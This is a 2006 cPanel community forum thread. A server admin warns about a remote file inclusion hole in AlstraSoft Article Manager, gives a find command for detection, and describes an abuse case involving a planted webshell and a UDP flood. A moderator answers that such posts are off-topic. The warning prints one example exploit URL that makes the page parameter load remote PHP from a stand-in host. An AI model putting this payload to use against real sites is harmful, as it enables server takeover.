The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Nasty AlstraSoft Article Manager Exploit Found

Discussion in 'General Discussion' started by LiNUxG0d, Jul 26, 2006.

  1. LiNUxG0d

    LiNUxG0d Well-Known Member

    Joined:
    Jun 25, 2003
    Messages:
    206
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Gatineau, Quebec, Canada
    Hey all,

    If a user is using AlstraSoft Article Manager, there is currently an exploit which allows the script to INCLUDE any URL on the net. If the URL points to a TEXT version of a PHP script, it will execute it IN the body of the Article Site Manager thus spawning a PHP webshell.

    If you suspect someone is running this, search for these common files in a Linux shell as root or a sudoer:

    find /home -name "mostpopulararticles.php"

    If you find this, please be weary. I've already proven it on two of my dedicated server owners and man, it's nasty. The script kiddies used it and uploaded 4.5 GIG's of DVD RIPs.

    The proof in the pudding:

    http://infectedarticlesite.com/?page=http://somedomain.com/file.txt

    Mods, I hope this is appropriate; we don't have a security section and really, I think everyone should know this exploit exists since my server got hit and our main pipe was crippled with 90Mbit of UDP ping traffic (UDP flood through IRC, planted by the webshell).

    Don't get caught with your pants down folks, stay alert!

    Jamie
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    It isn't really appropriate to these forums unless it is for a script that's provided by cPanel. There are exploits published for all sorts of script applications daily. If people want to keep up with them they should subscribe to the likes of Bugtraq.
     
  3. LiNUxG0d

    LiNUxG0d Well-Known Member

    Joined:
    Jun 25, 2003
    Messages:
    206
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Gatineau, Quebec, Canada
    Ok Jonathan,

    Just wanted to provide a heads up for preventative purposes.

    My appolagies, sometimes I get overly concerned with others security. ;) I'll stick to mine.

    Hehehehe,

    Jamie
     

Share This Page